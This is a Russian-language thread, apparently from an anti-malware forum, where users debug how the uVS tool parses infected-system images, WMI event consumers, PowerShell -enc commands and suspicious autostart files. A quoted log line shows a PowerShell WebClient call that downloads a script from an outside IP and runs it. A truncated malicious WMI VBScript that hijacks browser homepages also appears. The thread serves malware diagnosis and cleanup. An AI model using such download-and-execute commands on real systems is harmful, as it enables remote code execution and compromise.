Перейти к содержанию

Recommended Posts

demkd
33 минут назад, santy сказал:

а что здесь означает ключ -enc? закодированный объект?

Accepts a base-64-encoded string version of a command.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
alamor
В 12 января 2019 г. at 5:01 PM, santy сказал:

demkd,

а здеcь странный получился разбор, хотя случай все тот же: Dark.Galaxy &miner хотя и посвежее случай.

;uVS v4.1.2 [http://dsrt.dyndns.org] [Windows 6.1.7601 SP1 Service Pack 1]
; WMI: обработчики событий


 

АЛЕКСЕЙ-HP_2019-01-11_21-19-41_v4.1.2.7z

Там ещё странно разобрало

 

SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('HTTP://173.208.139.170/S.TXT')&POWERSHELL.EXE

+ если там нашло путь

C:\WINDOWS\UPDATE.EXE

и не нашло

S&C:\WINDOWS\UPDATE.EXE

 то может не стоит выводить в лог S&C:\WINDOWS\UPDATE.EXE ? Вроде понятно, что тут перебор с вариантами разбиения строки.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
В 12.01.2019 at 10:17 PM, demkd сказал:

в принципе ничего нового, просто затрудняет машинный анализ вот и все, возможно есть смысл отдельно обрабатывать powershell и следить за его командной строкой если -enc то как то это выделять

demkd,

а можно в данном случае применить delwmi %Sys32%\CMD.EXE, чтобы удалить все левые объекты, связанные с cmd.exe? заметно активен Dark.Galaxy или Dark Cloud (по классификации китайцев)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

PowerShell + WMI

https://github.com/FortyNorthSecurity/WMImplant

нет на них зоозащитников. :mellow:

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
8 часов назад, santy сказал:

а можно в данном случае применить delwmi %Sys32%\CMD.EXE, чтобы удалить все левые объекты, связанные с cmd.exe? заметно активен Dark.Galaxy или Dark Cloud (по классификации китайцев)

да, удалится только то что есть в разделе wmi

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

Полное имя                  C:\WINDOWS\SYSTEM32\CSCRIPT.EXE
Имя файла                   CSCRIPT.EXE
Тек. статус                 ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске
                            
Сохраненная информация      на момент создания образа
Статус                      ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске
File_Id                     5BD3D75129000
Linker                      9.0
Размер                      156160 байт
Создан                      14.11.2018 в 15:10:24
Изменен                     27.10.2018 в 06:11:14
                            
TimeStamp                   27.10.2018 в 03:11:13
EntryPoint                  +
OS Version                  0.1
Subsystem                   Windows character-mode user interface (CUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла                   64-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Действительна, подписано Microsoft Windows
                            
Оригинальное имя            cscript.exe.mui
Версия файла                5.8.7600.16385
Описание                    Microsoft ® Console Based Script Host
Производитель               Microsoft Corporation
                            
Доп. информация             на момент обновления списка
SHA1                        AE820F8FF22356E1EBB1475E3395CA62A8A4F84B
MD5                         75C33A5AFDCEC0AA45EE334F31B2AE58
                            
Namespace                   \\.\root\subscription
Consumer_Name               BVTConsumer
Consumer_Class              CommandLineEventConsumer
Consumer_CommandLineTemplatecscript KernCap.vbs
Consumer_WorkingDirectory   C:\\tools\\kernrate
Filter_Name                 BVTFilter
Filter_Class                __EventFilter
Filter_Query                SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99
#MOF_Bind#                  
instance of __FilterToConsumerBinding
{
    Consumer = "CommandLineEventConsumer.Name=\"BVTConsumer\"";
    CreatorSID = {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 134, 116, 119, 185, 125, 13, 122, 150, 112, 189, 41, 154, 244, 1, 0, 0};
    Filter = "__EventFilter.Name=\"BVTFilter\"";
};

#MOF_Event#                 
instance of __EventFilter
{
    CreatorSID = {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 134, 116, 119, 185, 125, 13, 122, 150, 112, 189, 41, 154, 244, 1, 0, 0};
    EventNamespace = "root\\cimv2";
    Name = "BVTFilter";
    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA \"Win32_Processor\" AND TargetInstance.LoadPercentage > 99";
    QueryLanguage = "WQL";
};

#MOF_Consumer#              
instance of CommandLineEventConsumer
{
    CommandLineTemplate = "cscript KernCap.vbs";
    CreatorSID = {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 134, 116, 119, 185, 125, 13, 122, 150, 112, 189, 41, 154, 244, 1, 0, 0};
    Name = "BVTConsumer";
    RunInteractively = FALSE;
    WorkingDirectory = "C:\\\\tools\\\\kernrate";
};

---------------

т.е. uVS не выводит такие элементы WMI в качестве самостоятельной записи.

И будь там левак - оператор зевнёт пешку.

 

 

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

+

К выше написанному.

Полное имя                  KERNCAP.VBS
Имя файла                   KERNCAP.VBS
Тек. статус                 ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                      
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                            
Доп. информация             на момент обновления списка
Файл                        C:\WINDOWS\SYSTEM32\CSCRIPT.EXE
-------------

И где здесь полезная ИНФО. ?

http://forum.esetnod32.ru/forum3/topic15125/

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
8 часов назад, PR55.RP55 сказал:

И где здесь полезная ИНФО. ?

файла то физически нет, потому и отдельного объекта нет, да и это обломки криворуких разрабов винды, абослютно безопасные.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

 

 

 

В 18.01.2019 at 8:41 AM, demkd сказал:

файла то физически нет

А если так:  https://safezone.cc/threads/dopolnenie-v-rukovodstvo-po-hijackthis-fork.27470/

Цитата

С помощью этих событий вредоносное ПО, наподобие шпионского, может собирать информацию об оборудовании и программном обеспечении. Также они могут создавать канал для связи между компьютерами, выполнять скрипт как из внешнего файла, так и встроенный (бесфайловый). События могут вызываться подсистемой WMI самостоятельно через определённые промежутки времени либо вручную какой-либо программой, выполняющей специальный запрос к WMI.
(Действие HiJackThis: потребитель события WMI, фильтр, таймер и связка удаляются, как и вызываемый ими файл, если к нему указан полный путь)

 

Цитата

 

O25 - WMI Event: Имя события - Командная строка или код.

Имя события состоит из названия поставщика и и названия фильтра.
Командная строка может приобретать вид:
 

cscript KernCap.vbs (WorkDir="C:\\tools\\kernrate")

Это значит, что программа cscript.exe запускает файл KernCap.vbs, который находится в рабочем каталоге C:\tools\kernrate

Код может содержать первые 300 байт скрипта, встроенного в событие.

Пример вредоносной записи:

O25 - WMI Event: ASEC - EventFilter sethomePage2 - Dim objFS:Set objFS = CreateObject("Scripting.FileSystemObject"):On Error Resume Next : Const link = "index": Const linkChrome = "index":browsers = Array("IEXPLORE.EXE", "firefox.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.ex(2401 bytes)

 

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

+

В 18.01.2019 at 8:41 AM, demkd сказал:

файла то физически нет

А какая разница ?

В Инфо.: KERNCAP.VBS  нет информации которая содержится в Инфо.:  CSCRIPT.EXE

Есть файл - нет файла, а вся доступная информация должна быть.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

Тема\образ: http://www.tehnari.ru/f183/t262607/

Цитата

Полное имя                  EPRINT\HPEPRINT.EXE
Имя файла                   HPEPRINT.EXE
Тек. статус                   ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                            
                            
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                            
Доп. информация             на момент обновления списка
Файл                        C:\PROGRAM
CmdLine                     FILES\HP\HP EPRINT\HPEPRINT.EXE /CHECKJOBS
                            
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\HPEA3JOBS
                            
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FB472848-2278-4AC3-9FE0-5FFA799F1336}\Actions
Actions                     "C:\Program" Files\HP\HP ePrint\hpeprint.exe /CheckJobs
                            
Ссылка                      HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{FB472848-2278-4AC3-9FE0-5FFA799F1336}\


                            

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
7 минут назад, PR55.RP55 сказал:

"C:\Program" Files\HP\HP ePrint\hpeprint.exe /CheckJobs

Кто-то криворукий прописал путь, так что ничего удивительного нет.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

+

http://www.tehnari.ru/f183/t262601/

Тоже странная запись.

Полное имя                  C:\PROGRAMDATA\{01456982-0145-0145-014569822880}\LSM.EXE
Имя файла                   LSM.EXE
Тек. статус                   ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                           
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
Инф. о файле                Не удается найти указанный файл.
Цифр. подпись               проверка не производилась
                            
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\MICROSOFT LOCALMANAGER[WINDOWS 8.1 SINGLE LANGUAGE]
                            

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

+

+

Крайняя форма извращения: ( там же )

Цитата

C:\USERS\USER\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DOC001.EXE
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DOC001.EXE
C:\USERS\ADMIN\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DOC001.EXE
C:\USERS\192.168.1.43\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DOC001.EXE
C:\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DOC001.EXE
C:\USERS\1\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DOC001.EXE

uVS  поместил а Подозрительные только два файла из шести.

Предлагаю:

Автоматически помещать в Подозрительные все файлы при совпадении SHA1 ( и\или имени )

т.е. если файл  попал в подозрительные - то идёт проверка списка на совпадения.

Есть совпадение > файл в подозрительные. ( с соответствующий записью в Инфо - о причине )

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
27 минут назад, PR55.RP55 сказал:

Тоже странная запись.

Полное имя                  C:\PROGRAMDATA\{01456982-0145-0145-014569822880}\LSM.EXE

И чего в ней странного? Обычный каталог с непонятным LSM.
 

18 минут назад, PR55.RP55 сказал:

при совпадении SHA1

Кто-давно не говорил что uVS медленно создает образ... :D

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55
17 минут назад, demkd сказал:

Кто-давно не говорил что uVS медленно создает образ...

Зачем ?

Только для файлов которые попали в подозрительные.

Логика такая:  Файл в подозрительных > uVS берёт его SHA1 ( если таковая есть ) и прогоняет весь список на совпадение > если совпадение найдено - файл попадает в подозрительные > в Инфо. файла пишется информация по какой причине файл попал в подозрительные.

Да и проверку можно проводить на  готовом образе\списке.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
14 часов назад, PR55.RP55 сказал:

uVS  поместил а Подозрительные только два файла из шести.

у меня все шесть файликов сразу попали в подозрительные и вирусы при открытии образа. (без добавления новых сигнатур).

тот случай, когда образы автозапуска нужны не только для того, чтобы писать по ним скрипты, но и для пополнения баз сигнатур и правил, т.е. чтобы использовать заложенные в программе возможности к самообучению.

CoinMiner_DV.thumb.jpg.f48491b0d64d3e9baa4436e5f4eeda23.jpg

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

santy

Речь о том, что было _6_  одинаковых файлов, все файлы в \STARTUP но uVS  в подозрительные помещает только _2_ файла.

Да, настроить можно - но речь то не об этом.

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
15 часов назад, PR55.RP55 сказал:

Речь о том, что было _6_  одинаковых файлов, все файлы в \STARTUP но uVS  в подозрительные помещает только _2_ файла.

Да, настроить можно - но речь то не об этом.

предполагаю, потому, что не все что лежит в папках \STARTUP автоматически запускается. (могут быть файлы из разных профилей пользователя).

для тех, кому лень добавить сигнатуру и проверить список можно добавить: функцию в раздел "статус": все файлы с данным SHA1 (или MD5) подозрительные.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55
1 час назад, santy сказал:

можно добавить: функцию в раздел "статус": все файлы с данным SHA1 (или MD5) подозрительные.

Обозначив как:   Подозр SHA1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

Тема\образ:  http://www.tehnari.ru/f35/t262699/

C:\WINDOWS\TEMP\NFRV575A.TMP\SVCHOST.EXE

CPU ( 1 core )   399,00%

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Создайте учетную запись или войдите, чтобы комментировать

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Сообщения

    • Quincy
      Серёга Лысый известный балабол же
    • Александр Полиграф
      Проведение расследований с применением полиграфа. Выявление сотрудников "сливающих" информацию, осуществляющих попытки- получения данных, шпионаж, работа на конкурентов, сбор компромата и т.п. Осуществляем выезд к вам в офис. Гарантия конфиденциальности.  poligraf.msk.ru ПОЛИГРАФ МСК.pdf
    • PR55.RP55
      vesorv 1) С отключенным интернетом вы не сможете активировать лицензию на антивирус. а раз не сможете - то и не получите защиту. Значит активируем антивирус > Создаём образ системы и переносим его на внешний носитель. Получаем возможность проводить тестирование повторно. 2) Вам для тестирования не нужны "свежие" угрозы. Разработчик регулярно обновляет установочный пакет. Скажем за 2018 год вышла - 12 версия антивируса, затем вышла версия. 12.01> 12.02 > 12.03  и т.д. Интервал между версиями пару месяцев. За пару месяцев ничего принципиального и прорывного в защите не сделать. Установив вместо версии: 12.03  "устаревшую" версию 12.02 вы получите и устаревшую базу сигнатур вирусов. И здесь можно тестировать угрозы о которых антивирус не осведомлён. 3) Антивирус нужен для постоянной защиты. Установка не производиться на заражённую машину. так, как установочный пакет не предназначен для очистки системы. ( Да, в рекламных целях разработчик может написать, что есть такая возможность... Однако ) Вирус может повредить реестр, заблокировать работу Windows Installer, модифицировать критически важные системные файлы - система просто не будет работать должным образом. _Эффективная очистка возможна только на НЕ активной системе - при работе с Live CD или при загрузке с другой не заражённой системой. 4) Отключать нужно не только интернет  - но  и беспроводные блютус и Wi-Fi иначе вы рискуете получить заражение всех доступных устройств. 5) Многие вредоносные программы вы просто не сможете запустить. так, как могут быть ограничения на регион распространения  - тот кто заказывал разработку\модификацию например рассчитывает на атаку конкретной страны, банка. 6) По очистке и лечению. Это не одно и тоже. Есть антивирусы которые удаляют файлы\угрозы но при этом не очищают реестр от лишних записей. Удаление файла\угрозы без удаления записей может приводить к ошибкам в работе системы. Лечение файлов - здесь речь идёт прежде всего о файловых вирусах. Антивирус должен найти заражённый файл, найти нужный участок и очистить - причём очистить так, чтобы сохранилась работоспособность системы. Но очистка исполняемых файлов не имеет смысла - всё равно _современная система не сможет нормально работать так, как у файла не будет ЭЦП... а если критически важный  файл не пройдёт проверку на наличие ЭЦП то и система не запуститься... Единственно, что можно сделать - это заменить файл на оригинальный. А учитывая число файлов, разнообразие их версий  - это становиться нетривиальной задачей. Некоторые антивирусы\сканеры имеют архив с такими файлами ( для замены: EXPLORER.EXE; NTDETECT.COM; NTSD.EXE и т.д ) А большинство антивирусов таких архивов не имеет. 7) Вы не учитываете уровень ложных срабатываний\определений. Антивирус  может сработать на чистый файл. Значит нужно проверять систему ещё до работы с реальными угрозами. 8) Угроза, или нет ? Это философский вопрос. Здесь каждый разработчик решает сам - что является угрозой, а что нет. т.е. на файл ХХХ одни антивирус сработает - а другой антивирус на файл ХХХ не сработает. + Программы разработанные спец. службами например страна ****а разработала вирус с целью нарушения работы оборудования, в целях шпионажа, получения удалённого доступа. Разве разработчики антивирусов находящиеся под её юрисдикцией будут искать эту угрозу ? 9) Легальные шпионские программы - одни антивирусы их будут находить, а другие антивирусы их находить не будут. Под легальными нужно понимать такие компоненты системы которые устанавливает разработчик оборудования - мониторинг - обнаружение украденного оборудования - диагностические отчёты. т.е. антивирусы по умолчанию находятся вне равных условий. 10) У всех разное железо - и производитель распространяет установщики  с некими средними настройками - чтобы на старых\слабых PC не наблюдалось зависание. С разными настройками эвристики будет  разная  скорость\эффективность работы. Значит нужно, или тестировать всё по умолчанию, или накручивать параметры на максимум. Нужно будет оценивать стабильность работы системы после внесения изменений в работу антивируса. 11) Куда ушли ?  Да куда угодно. Потеряли интерес, стало больше информации и меньше времени на её обсуждение. Помните песню: " Куда уехал цирк ? он был ещё вчера " https://www.comss.ru/page.php?id=5777 Дело в том, что всё уже давно обсудили, и вся информация есть в сети. а все эти _публичные тестирования ( как бы это помягче сказать... ) Средняя температура по больнице в норме !    
    • vesorv
      1. На жесткий диск загружаются дистрибутивы антивирусов и "свежие" вредоносные программы (только те, которые не обнаруживает сканер антивируса, то есть кнопочка эта в антивирусе называется "выборочная проверка файлов"), работающие без интернета. 2. На операционной системе запускают вредоносные программы (антивирус не установлен) и убеждаются в том, что они работают. 3. На чистую операционную систему из дистрибутива устанавливают антивирус, отключают интернет, и запускают вредоносные программы. Записывают все действия антивируса - сколько угроз обнаружил, когда обнаружил, какой компонент обнаружил, проводил ли антивирус лечение, что изменилось в системе после лечения. Потом ставят другой антивирус на чистую систему и проводят те же операции.  Данный тест покажет способность антивирусов защищать от угроз и лечить систему без использования облака. Насколько данный тест отображает реальные возможности (то есть с применением облака) защиты антивирусов от новейших угроз и лечения системы от действий вредоносных программ ? Раньше на форуме было относительно много людей, которые обсуждали интерестные темы (в том числе эксперты). Куда ушли эти люди, где они сейчас общаются, на каких интернет-площадках ?
    • Deniis
×